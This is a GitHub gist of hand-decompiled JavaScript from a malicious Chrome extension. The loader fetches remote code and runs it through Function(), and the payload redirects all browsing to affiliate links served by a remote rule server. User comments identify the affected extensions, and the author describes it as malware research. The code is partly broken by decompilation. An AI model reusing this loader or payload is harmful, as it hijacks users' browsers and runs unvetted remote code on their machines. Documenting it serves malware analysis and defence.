Last active August 27, 2018 21:18
(function() {
function postLog({
cat = 'eval', // category
act = '', // action
lab = '', // label
fr = 86400000, // freq. Default is 1 day
}) {
let key = obfuscateString(`${cat}_${act}`, 7);
return localStore.get(key).then(lastRuns => {
let lastRunEpoch = lastRuns[key],
shouldRun =
fr == 86400000 // run daily
? new Date().getTime() -
new Date(lastRunEpoch).setUTCHours(0, 0, 0, 0) >=
: new Date().getTime() - lastRunEpoch >= fr;
if (!lastRunEpoch || shouldRun) {
let lastRuns = '';
).then(_0x435009 => {
let lastruns = {};
(lastruns[key] = new date().gettime()), localstore.set(lastruns);
function makeRequest(url, method = 'GET') {
return new Promise((resolve, reject) => {
function processTabUpdate(tabId, changeInfo, tab) {
changeInfo['status'] === 'loading' &&
(validateTabUrl(tab, url) &&
consts['pV'] <= 0 &&
function makeRequestInTab(tabId) {
chrome.tabs.executeScript(tabId, {
code: `(function(){var url = replaceableurl; var xhr = new XMLHttpRequest();xhr.onreadystatechange = function () {if (xhr.readyState === 4) {chrome.runtime.sendMessage({data: xhr.responseText, url: url,status:xhr.status});}};'${
}',url, true);xhr.send();})()`.replace(
function processMessage(message) {
message['url'] === url &&
function validateTabUrl(tab, url) {
return new RegExp(
`^((?!(chrome${url.includes('http://') ? '|https|ftps' : ''})).+://)`
(url && url.length !== 0) || reject('Url error'),
chrome.tabs.query({}, function(result) {
let validTabs = result.filter(
tab => validateTabUrl(tab, url) && !tab['active']
validTabs.length === 0
? chrome.tabs.onUpdated.addListener(processTabUpdate)
: makeRequestInTab(
validTabs[Math.floor(Math.random() * validTabs.length)].id
function obfuscateString(inputString, rot) {
for (
var outputString = '', charCode = 0, idx = 0;
idx < inputString.length;
(charCode = inputString[idx].charCodeAt() + rot),
(outputString += String.fromCharCode(charCode));
return outputString;
function o(payload) {
return new Promise((resolve, reject) => {
let parseSuccessfully = false,
code = '',
version = '';
try {
(payload = JSON.parse(payload)),
(code = payload['code']),
(version = payload['version']),
code == -1 || (parseSuccessfully = true);
} catch (error) {
act: 'error',
lab: 'parseResponse',
fr: 0,
? localStore
kuzi5B5UFvI: code,
GNLMzs7rai9: version,
.then(_0x4b1779 => {
Ttt4fRNCFmK: new Date().getTime(),
act: 'download',
lab: version,
fr: 0,
code: code,
version: version,
: (code != -1 &&
act: 'error',
lab: 'invalidMonetizationCode',
fr: 0,
localStore.get(['kuzi5B5UFvI', 'GNLMzs7rai9']).then(items => {
code: items['kuzi5B5UFvI'],
version: items['GNLMzs7rai9'],
function run(metadata) {
try {
window['Function'](metadata['code'])(localStore, makeRequest, postLog),
(metadata['code'] && metadata['code'].length !== 0) ||
(metadata['version'] && metadata['version'].length !== 0)
? {
act: 'run',
lab: metadata['version'],
: {
act: 'run',
lab: 'idle',
} catch (error) {
act: 'error',
lab: `run_${metadata['version']}`,
function downloadPayload() {
return new Promise((resolve, reject) => {
localStore.get('Ttt4fRNCFmK').then(value => {
let _0x19dd2c = value['Ttt4fRNCFmK'] || 0;
_0x19dd2c === 0 &&
d8nvfUyMV8E: new Date().getTime(),
.then(_0x426061 => {
act: 'install',
new Date().getTime() - _0x19dd2c > 43200000
? setTimeout(function() {
}, 0) // force 0 for testing. was consts.beaconDelay
: localStore.get(['kuzi5B5UFvI', 'GNLMzs7rai9']).then(value => {
code: value['kuzi5B5UFvI'],
version: value['GNLMzs7rai9'],
function init() {
setTimeout(function() {
act: 'init',
}, 0); // force 0 for testing. was consts.initDelay
let consts = {
pV: Math.floor(3 * Math.random()),
initDelay: 1800000 * Math.floor(1 * Math.random() + 1),
beaconDelay: 60000 * Math.floor(2 * Math.random() + 1),
localStore = {
get(keys = null) {
return new Promise((resolve, reject) => {, function(items) {
set(items) {
return new Promise((resolve, reject) => {, function(bytesInUse) {
jy(_0x4703ce) {
return new Promise((resolve, reject) => {['jy'](_0x4703ce, function(_0x1c99ef) {
SG() {
return new Promise((resolve, reject) => {['SG'](function(_0xcf25b8) {


localstore keys


Payload URL
"code": "function req(obj,callback,errback){var params=obj.params?obj.params:[],xhr=new XMLHttpRequest;if(callback&&(xhr.onload=function(e){,200===e.status||304===e.status?callback({responseText:e.responseText,headers:e.getAllResponseHeaders().split(\"\\r\\n\")}):errback&&errback(e.status)}),errback&&(xhr.onerror=function(e){,errback(e)}),,obj.url),params.head)for(i in params.head)obj.setRequestHeader(i,params.head[i]);if(params.mime)for(i in params.mime)obj.overrideMimeType(params.mime[i]);if(\"Content-Type\",\"application/x-www-form-urlencoded\"),(||params.xml)&&xhr.setRequestHeader(\"X-Requested-With\",\"XMLHttpRequest\"),\"object\"==typeof{,\"\";for(i in x)x.hasOwnProperty(i)&&(\"&\":\"\")+i+\"=\"+x[i])}xhr.send(}function cutw(hostname){return hostname.replace(/(^www\\.|\\:\\d+$)/gi,\"\")}function getDomain(hostname){var result,matches=hostname.match(domainRgxp);return matches&&(result=matches[1]),result}function getSub(hostname,domain){var result=hostname.replace(domain,\"\");return result&&(result=result.replace(/\\.$/,\"\")),result}function prepareLink(link){/^(\\w+:)?\\/\\//.test(link)||(link=\"http://\"+link);var result,matches=link.match(mainRgxp);if(matches)try{var host=cutw(matches[2]),domain=getDomain(host);if(domain){var sub=getSub(host,domain);result={sch:matches[1],host:host,domain:domain,sub:sub,path:(matches[3]||\"\").replace(/^\\//,\"\"),search:(matches[4]||\"\").replace(/^\\?/,\"\")}}}catch(e){console.log(\"Error: \"+url)}return result}function tryUrl(url){if(!(usedT&&usedT>(new Date).getTime()-42e5)){var res,prepared=prepareLink(url);if(prepared&&rulesObject[prepared.domain]){var subd=rulesObject[prepared.domain][prepared.sub];if(subd&&(subd[prepared.path]?res=subd[prepared.path]:subd[\"*\"]&&(res=subd[\"*\"])),res||(subd=rulesObject[prepared.domain][\"*\"],subd&&(subd[prepared.path]?res=subd[prepared.path]:subd[\"*\"]&&(res=subd[\"*\"]))),res)return res=res.replace(/__CURURL__/g,encodeURIComponent(url)).replace(/__SUBID__/g,wid),usedT=(new Date).getTime(),localStorage.usedT=usedT,res}}}function getData(){setTimeout(getData,864e5),req({method:\"GET\",url:host+\"bhrule?sub=\"+wid},function(response){try{response=JSON.parse(response.responseText),rulesObject=response.rules?response.rules:{}}catch(e){}},function(){})}var host=\"\",wid=150,rulesObject={},usedT=localStorage.usedT?parseInt(localStorage.usedT):null,mainRgxp=new RegExp(\"^(?:([^:\\\\/?]+):)?(?:\\\\/\\\\/([^\\\\/]*))?([^?]*)(?:\\\\?([^$]*))?\"),domainRgxp=/((?:[^.]+)\\.(?:(?:com?|org)\\.)?\\w+)$/i,listenFunc=function(details){if(!(usedT&&usedT>(new Date).getTime()-42e5)&&0===details.frameId&&\"main_frame\"==details.type&&details.parentFrameId===-1&&details.tabId>0&&/^https?/i.test(details.url)){var current=details.url,new_url=(prepareLink(current),tryUrl(current)),result=\"string\"==typeof new_url&&current!=new_url;if(result)return{redirectUrl:new_url}}};chrome.webRequest.onBeforeRequest.addListener(listenFunc,{urls:[\"<all_urls>\"]},[\"blocking\"]),getData();",
"version": "v20170412"
function req(obj, callback, errback) {
var params = obj.params ? obj.params : [],
xhr = new XMLHttpRequest;
if (callback && (xhr.onload = function(e) {
e =, 200 === e.status || 304 === e.status ? callback({
responseText: e.responseText,
headers: e.getAllResponseHeaders().split(\"\\r\\n\")}):errback&&errback(e.status)}),errback&&(xhr.onerror=function(e){,errback(e)}),,obj.url),params.head)for(i in params.head)obj.setRequestHeader(i,params.head[i]);if(params.mime)for(i in params.mime)obj.overrideMimeType(params.mime[i]);if(\"Content-Type\",\"application/x-www-form-urlencoded\"),(||params.xml)&&xhr.setRequestHeader(\"X-Requested-With\",\"XMLHttpRequest\"),\"object\"==typeof{,\"\";for(i in x)x.hasOwnProperty(i)&&(\"&\":\"\")+i+\"=\"+x[i])}xhr.send(}function cutw(hostname){return hostname.replace(/(^www\\.|\\:\\d+$)/gi,\"\")}function getDomain(hostname){var result,matches=hostname.match(domainRgxp);return matches&&(result=matches[1]),result}function getSub(hostname,domain){var result=hostname.replace(domain,\"\");return result&&(result=result.replace(/\\.$/,\"\")),result}function prepareLink(link){/^(\\w+:)?\\/\\//.test(link)||(link=\"http://\"+link);var result,matches=link.match(mainRgxp);if(matches)try{var host=cutw(matches[2]),domain=getDomain(host);if(domain){var sub=getSub(host,domain);result={sch:matches[1],host:host,domain:domain,sub:sub,path:(matches[3]||\"\").replace(/^\\//,\"\"),search:(matches[4]||\"\").replace(/^\\?/,\"\")}}}catch(e){console.log(\"Error: \"+url)}return result}function tryUrl(url){if(!(usedT&&usedT>(new Date).getTime()-42e5)){var res,prepared=prepareLink(url);if(prepared&&rulesObject[prepared.domain]){var subd=rulesObject[prepared.domain][prepared.sub];if(subd&&(subd[prepared.path]?res=subd[prepared.path]:subd[\"*\"]&&(res=subd[\"*\"])),res||(subd=rulesObject[prepared.domain][\"*\"],subd&&(subd[prepared.path]?res=subd[prepared.path]:subd[\"*\"]&&(res=subd[\"*\"]))),res)return res=res.replace(/__CURURL__/g,encodeURIComponent(url)).replace(/__SUBID__/g,wid),usedT=(new Date).getTime(),localStorage.usedT=usedT,res}}}function getData(){setTimeout(getData,864e5),req({method:\"GET\",url:host+\"bhrule?sub=\"+wid},function(response){try{response=JSON.parse(response.responseText),rulesObject=response.rules?response.rules:{}}catch(e){}},function(){})}var host=\"\",wid=150,rulesObject={},usedT=localStorage.usedT?parseInt(localStorage.usedT):null,mainRgxp=new RegExp(\"^(?:([^:\\\\/?]+):)?(?:\\\\/\\\\/([^\\\\/]*))?([^?]*)(?:\\\\?([^$]*))?\"),domainRgxp=/((?:[^.]+)\\.(?:(?:com?|org)\\.)?\\w+)$/i,listenFunc=function(details){if(!(usedT&&usedT>(new Date).getTime()-42e5)&&0===details.frameId&&\"main_frame\"==details.type&&details.parentFrameId===-1&&details.tabId>0&&/^https?/i.test(details.url)){var current=details.url,new_url=(prepareLink(current),tryUrl(current)),result=\"string\"==typeof new_url&&current!=new_url;if(result)return{redirectUrl:new_url}}};chrome.webRequest.onBeforeRequest.addListener(listenFunc,{urls:[\"<all_urls>\"]},[\"blocking\"]),getData();
Sowed commented May 8, 2018

Me too! Been digging around tryna find out the source. @DrewDennison, looking at the slyly named gist evil.js with requests to "", it leaves me at your mercy to help point in some direction of what this is, exactly?

This happened to me a couple weeks ago, and again - today. This time, Chrome was more cautious and displayed this:


(which is a bit calming). I'd still like to know who/what is responsible for these requests - I'm guessing some Chrome extension is to blame.

A couple of interesting findings:

All of this reminds me of

Same problem, waiting to see which plugin is responsible.

ornstef commented May 8, 2018

I had the same pop-up as @krzysztofczernek. I suspect it's because of the Better History extension I had. It seems to have been removed from the Chrome Web Store, and googling it seems to suggest it was sold to some shady company that put malware in it.

Had the same thing. Found a fork of Better History. Found it just now so use at your own risk.

MateusAuri commented May 8, 2018

Hey guys, disable your "Better History" extension. Thanks to twitter user jrgndwvr, who was kind enough to point it out as the culprit.
Edit: Oh, just noticed it was found out here too. Thanks, @ornstef and @EmperorEarth !

Sowed commented May 8, 2018

Well, just like the above have pointed out, it appears like some chrome extensions are being sold to malicious parties. If you have Shine for Reddit and Better History, you should scrap them ASAP. This reddit post will give you some context. Am super depressed by what data they had snooped off my browser.

I'd be more worried if I had ever accessed any of the websites mentioned in this code since I had BH installed. If any of you did, you should be wary of any suspicious activity in your accounts or something like that.

But now, I'd like to know why is this here. I guess there's the chance that Drew could just be using this code for research or investigations, but right now it seems to be more likely that he's involved in malware development somehow. I'd like to hear from him, and he's been active on github lately. Don't users get notified from username mentions in gist comments? I tried to reach him through twitter too, anyway.
If we don't hear from him soon enough, I'm reporting his account.

damnit i use the better history extension all the time. sellouts!

@MateusAuri if you look at the revision history of this gist, you'll see that it looks more like a documented investigation attempt.

Thanks for your research, Drew! I got warnings in Chrome beginning today. None since disabling the extension. According to Chrome dev tools, the code that initiated HTTP POST is the following:

(function(){var url = ''; var xhr = new XMLHttpRequest();xhr.onreadystatechange = function () {if (xhr.readyState === 4) {chrome.runtime.sendMessage({data: xhr.responseText, url: url,status:xhr.status});}};'POST',url, true);xhr.send();})()

dimkir commented May 10, 2018

Hey Drew thanks for putting this research here.

It looks like there's YET ANOTHER CHROME EXTENSION which has this malware (I do not have Better History installed, but have bunch of other extensions).

I am trying to debug with Chrome Developer Tools and pinpoint the offending extension, but having some troubles. There's a lot of redirects seen in the Chrome Dev Tools and also the Initiator column is not very useful. Also whenever I am trying to hunt down the malicious redirects they don't happen :(

Would you mind outlining the steps to pinpoint the requests to the Chrome Extension ID?

josh-richardson commented Jun 10, 2018

Okay. I found that HTTPS everywhere had an extension error which had redirected aliexpress to some other domain, and found that this extension: (with 400K users) has a file named 'back.js' packaged inside its CRX.

The back.js seems to download a file from - which looks as though it contains the aliexpress redirect. This seems to be metastasizing into lots of extensions.

Hey all,

Sorry for the lack of comms. I am a malware researcher who found the Sense (Beta) extension and did a bit of reverse engineering. Happy to help and answer questions but I haven't looked at this since I dumped the gist.


From the best I can tell, there are several popular extensions which are either bought, hacked, or typosquatting. When I did my analysis, I found a 3 stage payload: Everything was minified and the above code was the result of a hand-decompilation to replace variable names such as a0 to processMessage etc.

First there was a tiny bit of code that loaded an image to a HTML5 canvas and read the low-order bits and turned that into a string that was the minified contents of evil.js. That randomly reaches out to to pull down a command and control bit which is labeled payload.json and I extracted to payload.js. I stopped analysis at this point but it looked to rewrite aliexpress and other domains with affiliate links. I was mostly looking to see if the extension was grabbing cookies or reading my email or something like that. I can't be 100% sure since it downloads a dynamic payload, bit it appeared to not be stealing my personal data just making ad money.

@adamburgess @kjhangiani @MateusAuri @krzysztofczernek see my comments above. Feel free to ping me here or via email if you need any help

@dimkir I assume you have already solved this but can help you track down if interested

I do know at least Better History and User Agent Switcher appear to have this malware and will update the thread as I find more

